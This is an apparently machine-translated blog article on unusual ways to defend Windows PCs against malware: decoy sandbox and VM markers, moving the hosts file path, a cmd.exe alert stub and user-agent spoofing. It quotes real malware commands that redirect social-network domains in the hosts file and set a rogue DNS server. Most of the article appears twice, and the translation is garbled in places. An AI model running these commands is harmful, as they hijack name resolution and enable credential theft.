Non-obvious ways to protect against malware
In disputes and discussions on how to protect your computer from malware, many copies are broken and many books and articles can be found on this topic, and most of them simply duplicate each other, telling the same thing in different words. Anyone who is interested in information security is extremely difficult in such discussions and articles to meet about the protection of something new, which he did not know before or simply did not think about it ... but, as it sounds arrogant, I still try to wake you up at least a bit of interest in this hackneyed topic and tell you about non-obvious ways of protection, omitting the senile grumbling about the need to update plugins to browsers in time, not to follow left links, etc.
In this small note about some interesting features of the functioning of malware, I urge you to abandon the antivirus and other methods of self-defense - updates, program settings and care when clicking on links and launching applications ... to the word "call" we add the particle "NOT" and everything will be their places.
')
This article should be considered only as an unusual review of common actions in the behavior of Malvari, against which we can create protection, which should be regarded more as “oh, cool, the malware does not work!” And as some kind of zest found in viral studies.
You should start with the fact that the most obvious protection is to use a user account, not an administrator, but because only a few are capable of such a sacrifice, and the majority with admin rights, we will no longer return to this unpleasant topic, but in view of this, it still stands, all of a sudden, it will come in handy.
[offtopic] my language is itching to shout that the java plugin needs to be turned off, and to turn it on only when necessary, that viewing the pdf in the browser is not particularly needed, because the files are best saved for hard, and then watch them through some kind of left one not an interesting pdf-viewer that you can turn off autorun from flash drives by inserting a couple of lines into the registry, which is ..., but all these half-obvious protection methods are known from without me, therefore I ask you to forgive everyone: those who expected a complete security analysis PC for the fact that it will not, and those who were expecting only new - for what I remembered about this classic. [/ offtopic]
I am a cloud, a cloud, a cloud, and not a bear
Quite a few Malvari (although rather their creators) are aware of the existence of antiviruses, virus analysts, automatic analysis systems and other infrastructure of the “corporation of good” and in every way try to complicate their lives and extend the life of their handicrafts by various techniques to complicate the analysis of malware and overlay on him a detect. The simplest example of this is cryptography / packaging, which kills a small herd of hares at once:
- if the malware is detected, then repacked it and again in chocolate
- disassemblers / static analyzer become useless (manual parsing with a debugger is needed)
- not every anti-virus emulator will unwind even a simple cryptor
An example of the most that neither is banal, designed to show in what direction hackers think (in the right way they should be called criminals, but such a tradition has gone from somewhere to replace concepts ...). And the following thought (from the face of a Malvari): if I feel that I am being investigated, I will not malign, so that they do not understand how I work or do not understand my evil essence at all. She defines her “subject matter” as follows:
1. Launch detection under online behavior analysis services (Anubis, ThreatExpert, ...)
It is done by checking the name of the computer, the user, being in the address space of certain dll-libraries, key
operating system.
2. Virtual machine detection (VMWare, SandBox)
By searching for specific processes, registry keys, hardware, identifying differences with a conventional system with different assembler tricks.
3. Debug Detector
Checking certain bytes in the environment, searching for a window, process, driver.
4. Detection of active / passive monitoring utilities (RegMon, FileMon, RegShot)
This is usually implemented by searching the window by title.
The essence of this anti-virus protection to the ugliness is simple - let Malvari understand that it is being investigated and she herself will give up her bad intentions. Moving from theory to practice (within reasonable limits), one can say the following (on similar points):
1. The username and computer name is sandbox.
2. Process in the system: vmware.exe, VMwareTray.exe. Section HKLM \ SYSTEM \ ControlSet001 \ Services \ vmware. File vmnet.sys drivers.
3. Many will detect the SoftIce driver - just run it, it will throw the driver and that's it (yes, they are still looking for it!). Window with the class "OllyDBG".
4. Windows with the title "File Monitor - Sysinternals: www.sysinternals.com ", "Registry Monitor - Sysinternals: www.sysinternals.com ".
In essence, all this is simple to do (if you wish): during installation, specify certain names, create a pair of keys / files, write a tool that will keep several windows invisible with certain names, and call the tool itself vmware.exe.
VKontakte is disabled for non-payment of hosting
Here you are funny, but many of our compatriots can see something similar on their screens. Trojans of the Qhost class, whose task is to edit the hosts file stupidly and get away with it, thus, the left IP address is assigned to the addresses of popular social networking sites (VKontakte, classmates) ... and a person will lose his login / password, and also send SMS ...
Despite the technological simplicity of creation, these Trojans bring great profit to the creators - a minimum of effort and in the short term a lot of VKontakte and money. hosts file is edited either directly (open-> record) or through command interpreters (creating and starting bat / vbs) - everything is very simple: along a certain fixed path (C: \ WINDOWS \ system32 \ drivers \ etc \ hosts) the file is in the end of which you need to add a few lines - this is the second programming lesson in any language after hello world! And here is a little trick of protection, the fact is that the path to the etc folder is specified in the registry and if you change the path to another folder (put all the files from the previous one there, and rub them from etc), the Trojan will be somewhat surprised ...
Here is the key:
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Tcpip \ Parameters \ \ DataBasePath
HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Services \ Tcpip \ Parameters \ \ DataBasePath (and for other 00X keys, respectively).
On the level of intelligence and nationality of the authors of some Trojans of this class, you can put forward an assumption even without looking at the code:
The batniki have (for simplicity, obfuscation removed, only the TANGLE variable is left for a visual understanding of how bat files are obfuscated) as follows:
Can you see the console? Not? And she is ...
When exploiting a vulnerability, the shellcode often performs various actions, manipulating cmd.exe, it’s easy to run it (the system will even find the path to it itself) and there are few letters in it and it is in the system, and this is very important for the shellcode, especially in the light of recent technologies, the change of addresses of everything that is possible in the address space.
Therefore, our main task is to put hackers and then a thick, suspiciously grunting pig: you can replace the system cmd.exe (including its copies in dllcache, i386, $ NtServicePackUninstall $) with our stub, which, when called, will save the passed parameters to the buffer and issue an alert “Continue, or not” and with the consent of that, with the same parameters, the normal cmd (previously put side by side in the renamed form) will be launched.
Modern malware does a lot of critical actions in the system by running cmd.exe with kilometer length parameters (for example, making changes to the same hosts).
You can complicate the stub by adding the ability to read from the config to which processes not to issue an alert about the launch, but immediately transfer the parameters to the new cmd.
This thought began to take shape, grow and strengthen when observing the constant approach of malware and cmd.exe - they became better friends and even more - it is Taras Bulba for them: it spawns, it kills itself - when an exploit is triggered, it is he who often launches the downloaded The malware and self-deletion method is also implemented via a bat-file, and during its operation, the malware sometimes loads the command interpreter with work.
Separately, I would like to note the existence of disembodied evil-doers, who have no thin exe-file in the system, but executes everything java - the exploit tells her what to do and she obediently executes. Here is an example from life (these actions are performed by the java.exe process):
For myself, this utility was written for research purposes; if you need source code or the tool itself, you can contact me and I will give it without problems, I don’t feel sorry.
At this point, it is worth noting another important detail that imposes severe restrictions on using this protection method on a real system: if you are a licensed user of the Immunity antivirus, then there will be a lot of requests to launch batch files from our left cmd.exe.
Linux to the right, Windows to the left
It is known that the majority of malware come to our computer through a window to the Internet - through the browser and its plug-ins, therefore putting protection at this stage (File - Work offline ... a joke), we will cut off the lion's share of threats. To do this, briefly consider the principle of the exploit pack:
1. Information about the browser and its version, operating system and language is retrieved from the User Agent.
2. Depending on the results of the first item (see below), the definition of which plug-ins are in general and the exploitation of their vulnerability occurs, or if there is nothing suitable among the existing exploits, nothing bad happens
Of course, there are exceptions when, regardless of anything, all the exploits are immediately thrust into the code of the page (maybe at least something will work), but most exploit packs keep statistics, accounting by countries, have a nice interface and other goodies and settings. Therefore, the philosophy of protection is as follows: you need to change the User Agent and indicate there something against which there is definitely no exploit reserve, such as Linux. Ideally, of course, it would generally replace UserAgent with a Linux browser with some kind of complete browser, but this, in theory, could result in small page distortions on some sites, although I did not notice this.
All the popular bundles (the same Blackhole exploit kit) will send you to communicate with Google in a moment, even without trying an exploit on your browser.
Instead of output
The article should in no way be taken as a call to abandon the antivirus and other reasonable remedies that you all know. Just now, in addition to them, one can either use the methods I have sounded, or not use them, but simply be aware of the existence of such obstacles in the life path of the malware.
In this small note about some interesting features of the functioning of malware, I urge you to abandon the antivirus and other methods of self-defense - updates, program settings and care when clicking on links and launching applications ... to the word "call" we add the particle "NOT" and everything will be their places.
')
This article should be considered only as an unusual review of common actions in the behavior of Malvari, against which we can create protection, which should be regarded more as “oh, cool, the malware does not work!” And as some kind of zest found in viral studies.
You should start with the fact that the most obvious protection is to use a user account, not an administrator, but because only a few are capable of such a sacrifice, and the majority with admin rights, we will no longer return to this unpleasant topic, but in view of this, it still stands, all of a sudden, it will come in handy.
[offtopic] my language is itching to shout that the java plugin needs to be turned off, and to turn it on only when necessary, that viewing the pdf in the browser is not particularly needed, because the files are best saved for hard, and then watch them through some kind of left one not an interesting pdf-viewer that you can turn off autorun from flash drives by inserting a couple of lines into the registry, which is ..., but all these half-obvious protection methods are known from without me, therefore I ask you to forgive everyone: those who expected a complete security analysis PC for the fact that it will not, and those who were expecting only new - for what I remembered about this classic. [/ offtopic]
I am a cloud, a cloud, a cloud, and not a bear
Quite a few Malvari (although rather their creators) are aware of the existence of antiviruses, virus analysts, automatic analysis systems and other infrastructure of the “corporation of good” and in every way try to complicate their lives and extend the life of their handicrafts by various techniques to complicate the analysis of malware and overlay on him a detect. The simplest example of this is cryptography / packaging, which kills a small herd of hares at once:
- if the malware is detected, then repacked it and again in chocolate
- disassemblers / static analyzer become useless (manual parsing with a debugger is needed)
- not every anti-virus emulator will unwind even a simple cryptor
An example of the most that neither is banal, designed to show in what direction hackers think (in the right way they should be called criminals, but such a tradition has gone from somewhere to replace concepts ...). And the following thought (from the face of a Malvari): if I feel that I am being investigated, I will not malign, so that they do not understand how I work or do not understand my evil essence at all. She defines her “subject matter” as follows:
1. Launch detection under online behavior analysis services (Anubis, ThreatExpert, ...)
It is done by checking the name of the computer, the user, being in the address space of certain dll-libraries, key
operating system.
2. Virtual machine detection (VMWare, SandBox)
By searching for specific processes, registry keys, hardware, identifying differences with a conventional system with different assembler tricks.
3. Debug Detector
Checking certain bytes in the environment, searching for a window, process, driver.
4. Detection of active / passive monitoring utilities (RegMon, FileMon, RegShot)
This is usually implemented by searching the window by title.
The essence of this anti-virus protection to the ugliness is simple - let Malvari understand that it is being investigated and she herself will give up her bad intentions. Moving from theory to practice (within reasonable limits), one can say the following (on similar points):
1. The username and computer name is sandbox.
2. Process in the system: vmware.exe, VMwareTray.exe. Section HKLM \ SYSTEM \ ControlSet001 \ Services \ vmware. File vmnet.sys drivers.
3. Many will detect the SoftIce driver - just run it, it will throw the driver and that's it (yes, they are still looking for it!). Window with the class "OllyDBG".
4. Windows with the title "File Monitor - Sysinternals: www.sysinternals.com ", "Registry Monitor - Sysinternals: www.sysinternals.com ".
In essence, all this is simple to do (if you wish): during installation, specify certain names, create a pair of keys / files, write a tool that will keep several windows invisible with certain names, and call the tool itself vmware.exe.
VKontakte is disabled for non-payment of hosting
Here you are funny, but many of our compatriots can see something similar on their screens. Trojans of the Qhost class, whose task is to edit the hosts file stupidly and get away with it, thus, the left IP address is assigned to the addresses of popular social networking sites (VKontakte, classmates) ... and a person will lose his login / password, and also send SMS ...
Despite the technological simplicity of creation, these Trojans bring great profit to the creators - a minimum of effort and in the short term a lot of VKontakte and money. hosts file is edited either directly (open-> record) or through command interpreters (creating and starting bat / vbs) - everything is very simple: along a certain fixed path (C: \ WINDOWS \ system32 \ drivers \ etc \ hosts) the file is in the end of which you need to add a few lines - this is the second programming lesson in any language after hello world! And here is a little trick of protection, the fact is that the path to the etc folder is specified in the registry and if you change the path to another folder (put all the files from the previous one there, and rub them from etc), the Trojan will be somewhat surprised ...
Here is the key:
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Tcpip \ Parameters \ \ DataBasePath
HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Services \ Tcpip \ Parameters \ \ DataBasePath (and for other 00X keys, respectively).
On the level of intelligence and nationality of the authors of some Trojans of this class, you can put forward an assumption even without looking at the code:
The batniki have (for simplicity, obfuscation removed, only the TANGLE variable is left for a visual understanding of how bat files are obfuscated) as follows:
SET TEATEATEA =% windir% \ System32 \ drivers \ etc \ hosts
SET TANGLE = .co
echo 66.55.140.181 my.mail.ru >>% TEATEATEA%
echo 66.55.140.181 m.my.mail.ru >>% TEATEATEA%
echo 66.55.140.181 vk% TANGLE% m >>% TEATEATEA%
Can you see the console? Not? And she is ...
When exploiting a vulnerability, the shellcode often performs various actions, manipulating cmd.exe, it’s easy to run it (the system will even find the path to it itself) and there are few letters in it and it is in the system, and this is very important for the shellcode, especially in the light of recent technologies, the change of addresses of everything that is possible in the address space.
Therefore, our main task is to put hackers and then a thick, suspiciously grunting pig: you can replace the system cmd.exe (including its copies in dllcache, i386, $ NtServicePackUninstall $) with our stub, which, when called, will save the passed parameters to the buffer and issue an alert “Continue, or not” and with the consent of that, with the same parameters, the normal cmd (previously put side by side in the renamed form) will be launched.
Modern malware does a lot of critical actions in the system by running cmd.exe with kilometer length parameters (for example, making changes to the same hosts).
You can complicate the stub by adding the ability to read from the config to which processes not to issue an alert about the launch, but immediately transfer the parameters to the new cmd.
This thought began to take shape, grow and strengthen when observing the constant approach of malware and cmd.exe - they became better friends and even more - it is Taras Bulba for them: it spawns, it kills itself - when an exploit is triggered, it is he who often launches the downloaded The malware and self-deletion method is also implemented via a bat-file, and during its operation, the malware sometimes loads the command interpreter with work.
Separately, I would like to note the existence of disembodied evil-doers, who have no thin exe-file in the system, but executes everything java - the exploit tells her what to do and she obediently executes. Here is an example from life (these actions are performed by the java.exe process):
cmd.exe / C "ChCp 1251 & netsh interface ip set dns name =" Local Area Connection "source = static addr = 5.199.140.178"
reg add "hkcu \ Software \ Microsoft \ Internet Explorer \ Main" / v "Start Page" / t REG_SZ / f / d "shtpp: //dubsearch.ru"
For myself, this utility was written for research purposes; if you need source code or the tool itself, you can contact me and I will give it without problems, I don’t feel sorry.
At this point, it is worth noting another important detail that imposes severe restrictions on using this protection method on a real system: if you are a licensed user of the Immunity antivirus, then there will be a lot of requests to launch batch files from our left cmd.exe.
Linux to the right, Windows to the left
It is known that the majority of malware come to our computer through a window to the Internet - through the browser and its plug-ins, therefore putting protection at this stage (File - Work offline ... a joke), we will cut off the lion's share of threats. To do this, briefly consider the principle of the exploit pack:
1. Information about the browser and its version, operating system and language is retrieved from the User Agent.
2. Depending on the results of the first item (see below), the definition of which plug-ins are in general and the exploitation of their vulnerability occurs, or if there is nothing suitable among the existing exploits, nothing bad happens
Of course, there are exceptions when, regardless of anything, all the exploits are immediately thrust into the code of the page (maybe at least something will work), but most exploit packs keep statistics, accounting by countries, have a nice interface and other goodies and settings. Therefore, the philosophy of protection is as follows: you need to change the User Agent and indicate there something against which there is definitely no exploit reserve, such as Linux. Ideally, of course, it would generally replace UserAgent with a Linux browser with some kind of complete browser, but this, in theory, could result in small page distortions on some sites, although I did not notice this.
All the popular bundles (the same Blackhole exploit kit) will send you to communicate with Google in a moment, even without trying an exploit on your browser.
Instead of output
The article should in no way be taken as a call to abandon the antivirus and other reasonable remedies that you all know. Just now, in addition to them, one can either use the methods I have sounded, or not use them, but simply be aware of the existence of such obstacles in the life path of the malware.
Source: https://habr.com/ru/post/172279/
All Articles